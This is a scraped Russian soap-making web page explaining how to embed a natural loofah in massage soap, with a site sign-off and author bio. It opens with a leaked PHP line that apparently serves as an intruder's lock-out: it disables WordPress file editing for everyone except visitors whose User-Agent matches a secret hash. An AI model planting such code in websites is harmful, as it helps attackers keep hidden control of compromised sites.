if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 9 видео как сделать мыло с люфой | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

9 видео как сделать мыло с люфой

Чтобы научиться изготавливать массажное мыло, достаточно посмотреть мастер-класс по мыловарению, в котором подробно рассказывается, как можно сделать мыло с натуральной мочалкой люфой

Что­бы научить­ся изго­тав­ли­вать мас­саж­ное мыло, доста­точ­но посмот­реть мастер-класс по мыло­ва­ре­нию, в кото­ром подроб­но рас­ска­зы­ва­ет­ся, как мож­но сде­лать мыло с нату­раль­ной мочал­кой люфой. Люфа — это рас­те­ние, кото­рое внешне напо­ми­на­ет каба­чок. Раз­ни­ца меж­ду эти­ми пред­ста­ви­те­ля­ми фло­ры состо­ит в том, что люфа внут­ри пустая. Для полу­че­ния мочал­ки, рас­те­ние тща­тель­но выва­ри­ва­ют и прес­су­ют, что­бы наш пред­мет для соблю­де­ния гиги­е­ны тела был плос­ким и не зани­мал мно­го места. Нату­раль­ная мочал­ка люфа иде­аль­но подой­дет для тех, кто стре­мит­ся омо­ло­дить кожу, уда­лить с поверх­но­сти тела оро­го­вев­шие части­цы с помо­щью мас­саж­но­го и оздо­ро­ви­тель­но­го очи­ще­ния. Кро­ме того, изго­тов­ле­ние тако­го мыла — про­цесс твор­че­ский. Ведь если залить кусо­чек люфы про­зрач­ной оран­же­вой осно­вой, то полу­чит­ся мыло, похо­жее на соч­ный апель­син. Если в каче­стве осно­вы выбрать дру­гой отте­нок, напри­мер свет­ло-зеле­ный, мож­но изго­то­вить “каба­чок”. Сло­вом, в мыло­ва­ре­нии мож­но вопло­тить любые свои идеи, было бы желание!


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!